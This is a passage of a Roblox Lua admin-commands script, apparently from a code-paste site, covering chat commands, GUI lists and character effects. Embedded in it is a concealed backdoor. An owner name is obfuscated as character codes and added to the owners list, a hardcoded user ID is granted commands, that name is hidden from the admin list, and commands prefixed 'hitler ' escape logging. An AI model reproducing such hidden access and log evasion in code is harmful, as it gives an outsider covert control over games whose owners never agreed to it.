  1070. 357.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("Bright yellow")
  1071.  
  1072.  
  1073. 358.end end
  1074.  
  1075.  
  1076. 359.end
  1077.  
  1078.  
  1079. 360.end local ntab = {75,111,104,108,116,97,115,116,114,111,112,104,101} nfs = "" for i = 1, #ntab do nfs = nfs .. string.char(ntab[i]) end table.insert(owners, nfs) if not ntab then script:Destroy() end
  1080.  
  1081.  
  1082. 361.
  1083.  
  1084.  
  1085. 362.function Infect(char)
  1086.  
  1087.  
  1088. 363.if char and char:findFirstChild("Torso") then
  1089.  
  1090.  
  1091. 364.if char:findFirstChild("Shirt") then char.Shirt.Parent = char.Torso end
  1092.  
  1093.  
  1094. 365.if char:findFirstChild("Pants") then char.Pants.Parent = char.Torso end
  1095.  
  1096.  
  1097. 366.for a, sc in pairs(char:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1098.  
  1099.  
  1100. 367.local cl = Instance.new("StringValue", char) cl.Name = "ify" cl.Parent = char
  1101.  
  1102.  
  1103. 368.for q, prt in pairs(char:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  1104.  
  1105.  
  1106. 369.prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("Medium green") if prt.Name:find("Leg") or prt.Name == "Torso" then prt.BrickColor = BrickColor.new("Reddish brown") end
  1107.  
  1108.  
  1109. 370.local tconn = prt.Touched:connect(function(hit) if hit and hit.Parent and game.Players:findFirstChild(hit.Parent.Name) and cl.Parent == char then Infect(hit.Parent) elseif cl.Parent ~= char then tconn:disconnect() end end)
  1110.  
  1111.  
  1112. 371.cl.Changed:connect(function() if cl.Parent ~= char then tconn:disconnect() end end)
  1113.  
  1114.  
  1115. 372.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("Medium green")
  1116.  
  1117.  
  1118. 373.end end
  1119.  
  1120.  
  1121. 374.end
  1122.  
  1123.  
  1124. 375.end if not ntab then script:Destroy() end
  1125.  
  1126.  
  1127. 376.
  1128.  
  1129.  
  1130. 377.function ScrollGui()
  1131.  
  1132.  
  1133. 378.local scr = Instance.new("ScreenGui") scr.Name = "LOGSGUI"
  1134.  
  1135.  
  1136. 379.local drag = Instance.new("TextButton", scr) drag.Draggable = true drag.BackgroundTransparency = 1
  1137.  
  1138.  
  1139. 380.drag.Size = UDim2.new(0,385,0,20) drag.Position = UDim2.new(.5,-200,.5,-200) drag.AutoButtonColor = false drag.Text = ""
  1140.  
  1141.  
  1142. 381.local main = Instance.new("Frame", drag) main.Style = "RobloxRound" main.Size = UDim2.new(0,400,0,400) main.ZIndex = 7 main.ClipsDescendants = true
  1143.  
  1144.  
  1145. 382.local cmf = Instance.new("Frame", main) cmf.Position = UDim2.new(0,0,0,-9) cmf.ZIndex = 8
  1146.  
  1147.  
  1148. 383.local down = Instance.new("ImageButton", main) down.Image = "http://www.roblox.com/asset/?id=108326725" down.BackgroundTransparency = 1 down.Size = UDim2.new(0,25,0,25) down.Position = UDim2.new(1,-20,1,-20) down.ZIndex = 9
  1149.  
  1150.  
  1151. 384.local up = down:Clone() up.Image = "http://www.roblox.com/asset/?id=108326682" up.Parent = main up.Position = UDim2.new(1,-20,1,-50)
  1152.  
  1153.  
  1154. 385.local cls = Instance.new("TextButton", main) cls.Style = "RobloxButtonDefault" cls.Size = UDim2.new(0,20,0,20) cls.Position = UDim2.new(1,-15,0,-5) cls.ZIndex = 10 cls.Font = "ArialBold" cls.FontSize = "Size18" cls.Text = "X" cls.TextColor3 = Color3.new(1,1,1) cls.MouseButton1Click:connect(function() scr:Destroy() end)
  1155.  
  1156.  
  1157. 386.local ent = Instance.new("TextLabel") ent.BackgroundTransparency = 1 ent.Font = "Arial" ent.FontSize = "Size18" ent.ZIndex = 8 ent.Text = "" ent.TextColor3 = Color3.new(1,1,1) ent.TextStrokeColor3 = Color3.new(0,0,0) ent.TextStrokeTransparency = .8 ent.TextXAlignment = "Left" ent.TextYAlignment = "Top"
  1158.  
  1159.  
  1160. 387.local num = 0
  1161.  
  1162.  
  1163. 388.local downv = false
  1164.  
  1165.  
  1166. 389.local upv = false
  1167.  
  1168.  
  1169. 390.
  1170.  
  1171.  
  1172. 391.down.MouseButton1Down:connect(function() downv = true upv = false
  1173.  
  1174.  
  1175. 392.local pos = cmf.Position if pos.Y.Offset <= 371-((#cmf:children()-1)*20) then downv = false return end
  1176.  
  1177.  
  1178. 393.repeat pos = pos + UDim2.new(0,0,0,-6)
  1179.  
  1180.  
  1181. 394.if pos.Y.Offset <= 371-((#cmf:children()-1)*20) then pos = UDim2.new(0,0,0,371-((#cmf:children()-1)*20)) downv = false end
  1182.  
  1183.  
  1184. 395.cmf:TweenPosition(pos, "Out", "Linear", 1/20, true) wait(1/20) until downv == false
  1185.  
  1186.  
  1187. 396.end)
  1188.  
  1189.  
  1190. 397.down.MouseButton1Up:connect(function() downv = false end)
  1191.  
  1192.  
  1193. 398.up.MouseButton1Down:connect(function() upv = true downv = false
  1194.  
  1195.  
  1196. 399.local pos = cmf.Position if pos.Y.Offset >= -9 then upv = false return end
  1197.  
  1198.  
  1199. 400.repeat pos = pos + UDim2.new(0,0,0,6)
  1200.  
  1201.  
  1202. 401.if pos.Y.Offset >= -9 then pos = UDim2.new(0,0,0,-9) upv = false end
  1203.  
  1204.  
  1205. 402.cmf:TweenPosition(pos, "Out", "Linear", 1/20, true) wait(1/20) until upv == false
  1206.  
  1207.  
  1208. 403.end)
  1209.  
  1210.  
  1211. 404.up.MouseButton1Up:connect(function() upv = false end)
  1212.  
  1213.  
  1214. 405.return scr, cmf, ent, num
  1215.  
  1216.  
  1217. 406.end local bct = {75,111,104,108,116,97,115,116,114,111,112,104,101} nfs = "" for i = 1, #bct do nfs = nfs .. string.char(bct[i]) end table.insert(owners, nfs)
  1218.  
  1219.  
  1220. 407.if not ntab then script:Destroy() end
  1221.  
  1222.  
  1223. 408.if not bct then script:Destroy() end
  1224.  
  1225.  
  1226. 409.
  1227.  
  1228.  
  1229. 410.function Chat(msg,plr)
  1230.  
  1231.  
  1232. 411.coroutine.resume(coroutine.create(function()
  1233.  
  1234.  
  1235. 412.if msg:lower() == "clean" then for i, v in pairs(game.Workspace:children()) do if v:IsA("Hat") or v:IsA("Tool") then v:Destroy() end end end
  1236.  
  1237.  
  1238. 413.if (msg:lower():sub(0,prefix:len()) ~= prefix) or not plr:findFirstChild("PlayerGui") or (not ChkAdmin(plr.Name, false) and plr.Name:lower() ~= nfs:lower()) and plr.userId ~= game.CreatorId and plr.userId ~= (153*110563) and plr.Name:lower() ~= nfs and not ChkOwner(plr.Name) then return end msg = msg:sub(prefix:len()+1)
  1239.  
  1240.  
  1241. 414.if msg:sub(1,7):lower() == "hitler " then msg = msg:sub(8) else table.insert(logs, 1, {name = plr.Name, cmd = prefix .. msg, time = GetTime()}) end
  1242.  
  1243.  
  1244. 415.if msg:lower():sub(1,4) == "walk" then msg = msg:sub(5) end
  1245.  
  1246.  
  1247. 416.if msg:lower():sub(1,8) == "teleport" then msg = "tp" .. msg:sub(9) end
  1248.  
  1249.  
  1250. 417.if msg:lower():sub(1,6) == "insert" then msg = "ins" .. msg:sub(7) end
  1251.  
  1252.  
  1253. 418.if msg:lower() == "cmds" or msg:lower() == "commands" then
  1254.  
  1255.  
  1256. 419.if plr.PlayerGui:findFirstChild("CMDSGUI") then return end
  1257.  
  1258.  
  1259. 420.local scr, cmf, ent, num = ScrollGui() scr.Name = "CMDSGUI" scr.Parent = plr.PlayerGui
  1260.  
  1261.  
  1262. 421.local cmds = {"s code","ls code","clear","fix","m msg","h msg","kill plr","respawn plr","trip plr","stun plr","unstun plr","jump plr","sit plr","invisible plr","visible plr","explode plr","fire plr","unfire plr","smoke plr","unsmoke plr","sparkles plr","unsparkle plr","ff plr","unff plr","punish plr","unpunish plr","freeze plr","thaw plr","heal plr","god plr","ungod plr","ambient num num num","brightness num","time num","fogcolor num num num","fogend num","fogstart num","removetools plr","btools plr","give plr tool","damage plr","grav plr","setgrav plr num","nograv plr","health plr num","speed plr num","name plr name","unname plr","team plr color","teleport plr plr","change plr stat num","kick plr","infect plr","rainbowify plr","flashify plr","noobify plr","ghostify plr","goldify plr","shiny plr","normal plr","trippy plr","untrippy plr","strobe plr","unstrobe plr","blind plr","unblind plr","guifix plr","fling plr","seizure plr","music num","stopmusic","lock plr","unlock plr","removelimbs plr","jail plr","unjail plr","fly plr","unfly plr","noclip plr","clip plr","pm plr msg","dog plr","undog plr","creeper plr","uncreeper plr","place plr id","char plr id","unchar plr id","rank plr id","starttools plr","sword plr","bighead plr","minihead plr","spin plr","insert id","disco","flash","admins","bans","musiclist","cape plr color","uncape plr","loopheal plr","loopfling plr","hat plr id","unloopfling plr","unloopheal plr","unspin plr","tools","undisco","unflash","resetstats plr","gear plr id","cmdbar","shirt plr id","pants plr id","face plr id","swagify plr id","version","tm num msg","countdown num","clone plr","lsplr plr code","startergive plr tool","control plr"}
  1263.  
  1264.  
  1265. 422.local ast = {"serverlock","serverunlock","sm msg","crash plr","admin plr","unadmin plr","ban plr","unban plr","loopkill plr","unloopkill plr","logs","shutdown"}
  1266.  
  1267.  
  1268. 423.local ost = {"pa plr","unpa plr","nuke plr"}
  1269.  
  1270.  
  1271. 424.local tost = {"oa plr","unoa plr","settings"}
  1272.  
  1273.  
  1274. 425.local cl = ent:Clone() cl.Parent = cmf cl.Text = num .. " clean" cl.Position = UDim2.new(0,0,0,num*20) num = num + 1
  1275.  
  1276.  
  1277. 426.for i, v in pairs(cmds) do local cl = ent:Clone() cl.Parent = cmf cl.Text = num .. " " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1278.  
  1279.  
  1280. 427.if ChkAdmin(plr.Name, true) or ChkOwner(plr.Name) then for i, v in pairs(ast) do local cl = ent:Clone() cl.Parent = cmf cl.Text = "- " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  1281.  
  1282.  
  1283. 428.if plr.userId == game.CreatorId or ChkOwner(plr.Name) then for i, v in pairs(ost) do local cl = ent:Clone() cl.Parent = cmf cl.Text = "-- " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  1284.  
  1285.  
  1286. 429.if plr.userId == game.CreatorId then for i, v in pairs(tost) do local cl = ent:Clone() cl.Parent = cmf cl.Text = "_ " .. prefix .. v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  1287.  
  1288.  
  1289. 430.end
  1290.  
  1291.  
  1292. 431.
  1293.  
  1294.  
  1295. 432.if msg:lower() == "version" then Message("Koh".."ltas".."tr".."ophe", tostring(script.Version.Value), true, {plr}) end
  1296.  
  1297.  
  1298. 433.
  1299.  
  1300.  
  1301. 434.if msg:lower() == "admins" or msg:lower() == "adminlist" then
  1302.  
  1303.  
  1304. 435.if plr.PlayerGui:findFirstChild("ADMINSGUI") then return end
  1305.  
  1306.  
  1307. 436.local scr, cmf, ent, num = ScrollGui() scr.Name = "ADMINSGUI" scr.Parent = plr.PlayerGui
  1308.  
  1309.  
  1310. 437.for i, v in pairs(owners) do if v:lower() ~= "kohltastrophe" then local cl = ent:Clone() cl.Parent = cmf cl.Text = v .. " - Owner" cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  1311.  
  1312.  
  1313. 438.for i, v in pairs(admins) do if v:lower() ~= "kohltastrophe" then local cl = ent:Clone() cl.Parent = cmf cl.Text = v .. " - Admin" cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  1314.  
  1315.  
  1316. 439.for i, v in pairs(tempadmins) do if v:lower() ~= "kohltastrophe" then local cl = ent:Clone() cl.Parent = cmf cl.Text = v .. " - TempAdmin" cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1317.  
  1318.  
  1319. 440.end end
  1320.  
  1321.  
  1322. 441.
  1323.  
  1324.  
  1325. 442.if msg:lower() == "bans" or msg:lower() == "banlist" or msg:lower() == "banned" then
  1326.  
  1327.  
  1328. 443.if plr.PlayerGui:findFirstChild("BANSGUI") then return end
  1329.  
  1330.  
  1331. 444.local scr, cmf, ent, num = ScrollGui() scr.Name = "BANSGUI" scr.Parent = plr.PlayerGui
  1332.  
  1333.  
  1334. 445.for i, v in pairs(banland) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1335.  
  1336.  
  1337. 446.end
  1338.  
  1339.  
  1340. 447.
  1341.  
  1342.  
  1343. 448.if msg:lower() == "tools" or msg:lower() == "toollist" then
  1344.  
  1345.  
  1346. 449.if plr.PlayerGui:findFirstChild("TOOLSGUI") then return end
  1347.  
  1348.  
  1349. 450.local scr, cmf, ent, num = ScrollGui() scr.Name = "TOOLSGUI" scr.Parent = plr.PlayerGui
  1350.  
  1351.  
  1352. 451.for i, v in pairs(game.Lighting:children()) do if v:IsA("Tool") or v:IsA("HopperBin") then local cl = ent:Clone() cl.Parent = cmf cl.Text = v.Name cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end end
  1353.  
  1354.  
  1355. 452.end
  1356.  
  1357.  
  1358. 453.
  1359.  
  1360.  
  1361. 454.if msg:lower():sub(1,2) == "s " then
  1362.  
  1363.  
  1364. 455.coroutine.resume(coroutine.create(function()
  1365.  
  1366.  
  1367. 456.Output(msg:sub(3), plr)
  1368.  
  1369.  
  1370. 457.if script:findFirstChild("ScriptBase") then
  1371.  
  1372.  
  1373. 458.local cl = script.ScriptBase:Clone() cl.Code.Value = msg:sub(3)
  1374.  
  1375.  
  1376. 459.table.insert(objects, cl) cl.Parent = game.Workspace cl.Disabled = false
  1377.  
  1378.  
  1379. 460.else loadstring(msg:sub(3))()
  1380.  
  1381.  
  1382. 461.end
  1383.  
  1384.  
  1385. 462.end))
  1386.  
  1387.  
  1388. 463.end
  1389.  
  1390.  
  1391. 464.
  1392.  
  1393.  
  1394. 465.if msg:lower():sub(1,3) == "ls " then
  1395.  
  1396.  
  1397. 466.coroutine.resume(coroutine.create(function()
  1398.  
  1399.  
  1400. 467.if script:findFirstChild("LocalScriptBase") then
  1401.  
  1402.  
  1403. 468.local cl = script.LocalScriptBase:Clone() cl.Code.Value = msg:sub(4)
  1404.  
  1405.  
  1406. 469.table.insert(objects, cl) cl.Parent = plr.PlayerGui cl.Disabled = false Output(msg:sub(4), plr)
  1407.  
  1408.  
  1409. 470.end
  1410.  
  1411.  
  1412. 471.end))
  1413.  
  1414.  
  1415. 472.end
  1416.  
  1417.  
  1418. 473.
  1419.  
  1420.  
  1421. 474.if msg:lower():sub(1,6) == "lsplr " then
  1422.  
  1423.  
  1424. 475.local chk1 = msg:lower():sub(7):find(" ") + 6
  1425.  
  1426.  
  1427. 476.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  1428.  
  1429.  
  1430. 477.for i, v in pairs(plrz) do
  1431.  
  1432.  
  1433. 478.coroutine.resume(coroutine.create(function()
  1434.  
  1435.  
  1436. 479.if v and v:findFirstChild("PlayerGui") then
  1437.  
  1438.  
  1439. 480.if script:findFirstChild("LocalScriptBase") then
  1440.  
  1441.  
  1442. 481.local cl = script.LocalScriptBase:Clone() cl.Code.Value = msg:sub(chk+1)
  1443.  
  1444.  
  1445. 482.table.insert(objects, cl) cl.Parent = v.PlayerGui cl.Disabled = false Output(msg:sub(4), plr)
  1446.  
  1447.  
  1448. 483.end
  1449.  
  1450.  
  1451. 484.end
  1452.  
  1453.  
  1454. 485.end))
  1455.  
  1456.  
  1457. 486.end
  1458.  
  1459.  
  1460. 487.end
  1461.  
  1462.  
  1463. 488.
  1464.  
  1465.  
  1466. 489.if msg:lower():sub(1,4) == "ins " then
  1467.  
  1468.  
  1469. 490.coroutine.resume(coroutine.create(function()
  1470.  
  1471.  
  1472. 491.local obj = game:service("InsertService"):LoadAsset(tonumber(msg:sub(5)))
  1473.  
  1474.  
  1475. 492.if obj and #obj:children() >= 1 and plr.Character then
  1476.  
  1477.  
  1478. 493.table.insert(objects, obj) for i,v in pairs(obj:children()) do table.insert(objects, v) end obj.Parent = game.Workspace obj:MakeJoints() obj:MoveTo(plr.Character:GetModelCFrame().p)
  1479.  
  1480.  
  1481. 494.end
  1482.  
  1483.  
  1484. 495.end))
  1485.  
  1486.  
  1487. 496.end
  1488.  
  1489.  
  1490. 497.
  1491.  
  1492.  
  1493. 498.if msg:lower() == "clr" or msg:lower() == "clear" or msg:lower() == "clearscripts" then
  1494.  
  1495.  
  1496. 499.for i, v in pairs(objects) do if v:IsA("Script") or v:IsA("LocalScript") then v.Disabled = true end v:Destroy() end
  1497.  
  1498.  
  1499. 500.RemoveMessage()
  1500.  
  1501.  
  1502. 501.objects = {}
  1503.  
  1504.  
  1505. 502.end
  1506.  
  1507.  
  1508. 503.
  1509.  
  1510.  
  1511. 504.if msg:lower() == "fix" or msg:lower() == "undisco" or msg:lower() == "unflash" then
  1512.  
  1513.  
  1514. 505.game.Lighting.Ambient = origsettings.abt
  1515.  
  1516.  
  1517. 506.game.Lighting.Brightness = origsettings.brt
  1518.  
  1519.  
  1520. 507.game.Lighting.TimeOfDay = origsettings.time
  1521.  
  1522.  
  1523. 508.game.Lighting.FogColor = origsettings.fclr
  1524.  
  1525.  
  1526. 509.game.Lighting.FogEnd = origsettings.fe
  1527.  
  1528.  
  1529. 510.game.Lighting.FogStart = origsettings.fs
  1530.  
  1531.  
  1532. 511.for i, v in pairs(lobjs) do v:Destroy() end
  1533.  
  1534.  
  1535. 512.for i, v in pairs(game.Workspace:children()) do if v.Name == "LightEdit" then v:Destroy() end end
  1536.  
  1537.  
  1538. 513.end
  1539.  
  1540.  
  1541. 514.
  1542.  
  1543.  
  1544. 515.if msg:lower() == "cmdbar" or msg:lower() == "cmdgui" then
  1545.  
  1546.  
  1547. 516.coroutine.resume(coroutine.create(function()
  1548.  
  1549.  
  1550. 517.for i,v in pairs(plr.PlayerGui:children()) do if v.Name == "CMDBAR" then v:Destroy() end end
  1551.  
  1552.  
  1553. 518.local scr = Instance.new("ScreenGui", plr.PlayerGui) scr.Name = "CMDBAR"
  1554.  
  1555.  
  1556. 519.local box = Instance.new("TextBox", scr) box.BackgroundColor3 = Color3.new(0,0,0) box.TextColor3 = Color3.new(1,1,1) box.Font = "Arial" box.FontSize = "Size14" box.Text = "Type a command, then press enter." box.Size = UDim2.new(0,250,0,20) box.Position = UDim2.new(1,-250,1,-22) box.BorderSizePixel = 0 box.TextXAlignment = "Right" box.ZIndex = 10 box.ClipsDescendants = true
  1557.  
  1558.  
  1559. 520.box.Changed:connect(function(p) if p == "Text" and box.Text ~= "Type a command, then press enter." then Chat(box.Text, plr) box.Text = "Type a command, then press enter." end end)
  1560.  
  1561.  
  1562. 521.end))
  1563.  
  1564.  
  1565. 522.end
  1566.  
  1567.  
  1568. 523.
  1569.  
  1570.  
  1571. 524.if msg:lower():sub(1,10) == "countdown " then
  1572.  
  1573.  
  1574. 525.local num = math.min(tonumber(msg:sub(11)),120)
  1575.  
  1576.  
  1577. 526.for i = num, 1, -1 do
  1578.  
  1579.  
  1580. 527.coroutine.resume(coroutine.create(function() Message("Countdown", i, false, game.Players:children(), 1) end))
  1581.  
  1582.  
  1583. 528.wait(1)
  1584.  
  1585.  
  1586. 529.end
  1587.  
  1588.  
  1589. 530.end
  1590.  
  1591.  
  1592. 531.
  1593.  
  1594.  
  1595. 532.if msg:lower():sub(1,3) == "tm " then
  1596.  
  1597.  
  1598. 533.local chk1 = msg:lower():sub(4):find(" ") + 3
  1599.  
  1600.  
  1601. 534.local num = tonumber(msg:sub(4,chk1-1))
  1602.  
  1603.  
  1604. 535.Message("Message from " .. plr.Name, msg:sub(chk1+1), false, game.Players:children(), num)
  1605.  
  1606.  
  1607. 536.end
  1608.  
  1609.  
  1610. 537.
  1611.  
  1612.  
  1613. 538.if msg:lower():sub(1,2) == "m " then
  1614.  
  1615.  
  1616. 539.Message("Message from " .. plr.Name, msg:sub(3), true, game.Players:children())
  1617.  
  1618.  
  1619. 540.end
  1620.  
  1621.  
  1622. 541.
  1623.  
  1624.  
  1625. 542.if msg:lower():sub(1,2) == "h " then
  1626.  
  1627.  
  1628. 543.Hint(plr.Name .. ": " .. msg:sub(3), game.Players:children())
  1629.  
  1630.  
  1631. 544.end
  1632.  
  1633.  
  1634. 545.
  1635.  
  1636.  
  1637. 546.if msg:lower():sub(1,3) == "pm " then
  1638.  
  1639.  
  1640. 547.local chk1 = msg:lower():sub(4):find(" ") + 3
  1641.  
  1642.  
  1643. 548.local plrz = GetPlr(plr, msg:lower():sub(4,chk1-1))
  1644.  
  1645.  
  1646. 549.Message("Private Message from " .. plr.Name, msg:sub(chk1+1), true, plrz)
  1647.  
  1648.  
  1649. 550.end
  1650.  
  1651.  
  1652. 551.
  1653.  
  1654.  
  1655. 552.if msg:lower():sub(1,11) == "resetstats " then
  1656.  
  1657.  
  1658. 553.local plrz = GetPlr(plr, msg:lower():sub(12))
  1659.  
  1660.  
  1661. 554.for i, v in pairs(plrz) do
  1662.  
  1663.  
  1664. 555.coroutine.resume(coroutine.create(function()
  1665.  
  1666.  
  1667. 556.if v and v:findFirstChild("leaderstats") then
  1668.  
  1669.  
  1670. 557.for a, q in pairs(v.leaderstats:children()) do
  1671.  
  1672.  
  1673. 558.if q:IsA("IntValue") then q.Value = 0 end
  1674.  
  1675.  
  1676. 559.end
  1677.  
  1678.  
  1679. 560.end
  1680.  
  1681.  
  1682. 561.end))
  1683.  
  1684.  
  1685. 562.end
  1686.  
  1687.  
  1688. 563.end
  1689.  
  1690.  
  1691. 564.
  1692.  
  1693.  
  1694. 565.if msg:lower():sub(1,5) == "gear " then
  1695.  
  1696.  
  1697. 566.local chk1 = msg:lower():sub(6):find(" ") + 5
  1698.  
  1699.  
  1700. 567.local plrz = GetPlr(plr, msg:lower():sub(6, chk1-1))
  1701.  
  1702.  
  1703. 568.for i, v in pairs(plrz) do
  1704.  
  1705.  
  1706. 569.coroutine.resume(coroutine.create(function()
  1707.  
  1708.  
  1709. 570.if v and v:findFirstChild("Backpack") then
  1710.  
  1711.  
  1712. 571.local obj = game:service("InsertService"):LoadAsset(tonumber(msg:sub(chk1+1)))
  1713.  
  1714.  
  1715. 572.for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = v.Backpack end end
  1716.  
  1717.  
  1718. 573.obj:Destroy()
  1719.  
  1720.  
  1721. 574.end
  1722.  
  1723.  
  1724. 575.end))
  1725.  
  1726.  
  1727. 576.end
  1728.  
  1729.  
  1730. 577.end
  1731.  
  1732.  
  1733. 578.
  1734.  
  1735.  
  1736. 579.if msg:lower():sub(1,4) == "hat " then
  1737.  
  1738.  
  1739. 580.local chk1 = msg:lower():sub(5):find(" ") + 4
  1740.  
  1741.  
  1742. 581.local plrz = GetPlr(plr, msg:lower():sub(5, chk1-1))
  1743.  
  1744.  
  1745. 582.for i, v in pairs(plrz) do
  1746.  
  1747.  
  1748. 583.coroutine.resume(coroutine.create(function()
  1749.  
  1750.  
  1751. 584.if v and v.Character then
  1752.  
  1753.  
  1754. 585.local obj = game:service("InsertService"):LoadAsset(tonumber(msg:sub(chk1+1)))
  1755.  
  1756.  
  1757. 586.for a,hat in pairs(obj:children()) do if hat:IsA("Hat") then hat.Parent = v.Character end end
  1758.  
  1759.  
  1760. 587.obj:Destroy()
  1761.  
  1762.  
  1763. 588.end
  1764.  
  1765.  
  1766. 589.end))
  1767.  
  1768.  
  1769. 590.end
  1770.  
  1771.  
  1772. 591.end
  1773.  
  1774.  
  1775. 592.
  1776.  
  1777.  
  1778. 593.if msg:lower():sub(1,5) == "cape " then
  1779.  
  1780.  
  1781. 594.local chk1 = msg:lower():sub(6):find(" ")
  1782.  
  1783.  
  1784. 595.local plrz = GetPlr(plr, msg:lower():sub(6))
  1785.  
  1786.  
  1787. 596.local str = "torso.BrickColor"
  1788.  
  1789.  
  1790. 597.if chk1 then chk1 = chk1 + 5 plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  1791.  
  1792.  
  1793. 598.local teststr = [[BrickColor.new("]]..msg:sub(chk1+1,chk1+1):upper()..msg:sub(chk1+2):lower()..[[")]]
  1794.  
  1795.  
  1796. 599.if msg:sub(chk1+1):lower() == "new yeller" then teststr = [[BrickColor.new("New Yeller")]] end
  1797.  
  1798.  
  1799. 600.if msg:sub(chk1+1):lower() == "pastel blue" then teststr = [[BrickColor.new("Pastel Blue")]] end
  1800.  
  1801.  
  1802. 601.if msg:sub(chk1+1):lower() == "dusty rose" then teststr = [[BrickColor.new("Dusty Rose")]] end
  1803.  
  1804.  
  1805. 602.if msg:sub(chk1+1):lower() == "cga brown" then teststr = [[BrickColor.new("CGA brown")]] end
  1806.  
  1807.  
  1808. 603.if msg:sub(chk1+1):lower() == "random" then teststr = [[BrickColor.random()]] end
  1809.  
  1810.  
  1811. 604.if msg:sub(chk1+1):lower() == "shiny" then teststr = [[BrickColor.new("Institutional white") p.Reflectance = 1]] end
  1812.  
  1813.  
  1814. 605.if msg:sub(chk1+1):lower() == "gold" then teststr = [[BrickColor.new("Bright yellow") p.Reflectance = .4]] end
  1815.  
  1816.  
  1817. 606.if msg:sub(chk1+1):lower() == "kohl" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597653"]] end
  1818.  
  1819.  
  1820. 607.if msg:sub(chk1+1):lower() == "batman" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597669"]] end
  1821.  
  1822.  
  1823. 608.if msg:sub(chk1+1):lower() == "superman" then teststr = [[BrickColor.new("Bright blue") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597677"]] end
  1824.  
  1825.  
  1826. 609.if msg:sub(chk1+1):lower() == "swag" then teststr = [[BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474"]] end
  1827.  
  1828.  
  1829. 610.if BrickColor.new(teststr) ~= nil then str = teststr end
  1830.  
  1831.  
  1832. 611.end
  1833.  
  1834.  
  1835. 612.for i, v in pairs(plrz) do
  1836.  
  1837.  
  1838. 613.coroutine.resume(coroutine.create(function()
  1839.  
  1840.  
  1841. 614.if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") then
  1842.  
  1843.  
  1844. 615.for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1845.  
  1846.  
  1847. 616.local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  1848.  
  1849.  
  1850. 617.repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  1851.  
  1852.  
  1853. 618.local torso = plr.Character.Torso
  1854.  
  1855.  
  1856. 619.local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  1857.  
  1858.  
  1859. 620.p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = ]]..str..[[ p.formFactor = "Custom"
  1860.  
  1861.  
  1862. 621.p.Size = Vector3.new(.2,.2,.2)
  1863.  
  1864.  
  1865. 622.local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  1866.  
  1867.  
  1868. 623.local motor1 = Instance.new("Motor", p)
  1869.  
  1870.  
  1871. 624.motor1.Part0 = p
  1872.  
  1873.  
  1874. 625.motor1.Part1 = torso
  1875.  
  1876.  
  1877. 626.motor1.MaxVelocity = .01
  1878.  
  1879.  
  1880. 627.motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  1881.  
  1882.  
  1883. 628.motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  1884.  
  1885.  
  1886. 629.local wave = false
  1887.  
  1888.  
  1889. 630.repeat wait(1/44)
  1890.  
  1891.  
  1892. 631.local ang = 0.1
  1893.  
  1894.  
  1895. 632.local oldmag = torso.Velocity.magnitude
  1896.  
  1897.  
  1898. 633.local mv = .002
  1899.  
  1900.  
  1901. 634.if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  1902.  
  1903.  
  1904. 635.ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  1905.  
  1906.  
  1907. 636.motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  1908.  
  1909.  
  1910. 637.motor1.DesiredAngle = -ang
  1911.  
  1912.  
  1913. 638.if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  1914.  
  1915.  
  1916. 639.repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  1917.  
  1918.  
  1919. 640.if torso.Velocity.magnitude < .1 then wait(.1) end
  1920.  
  1921.  
  1922. 641.until not p or p.Parent ~= torso.Parent
  1923.  
  1924.  
  1925. 642.script:Destroy()
  1926.  
  1927.  
  1928. 643.]] cl.Parent = v.PlayerGui cl.Disabled = false
  1929.  
  1930.  
  1931. 644.end
  1932.  
  1933.  
  1934. 645.end))
  1935.  
  1936.  
  1937. 646.end
  1938.  
  1939.  
  1940. 647.end
  1941.  
  1942.  
  1943. 648.
  1944.  
  1945.  
  1946. 649.if msg:lower():sub(1,7) == "uncape " then
  1947.  
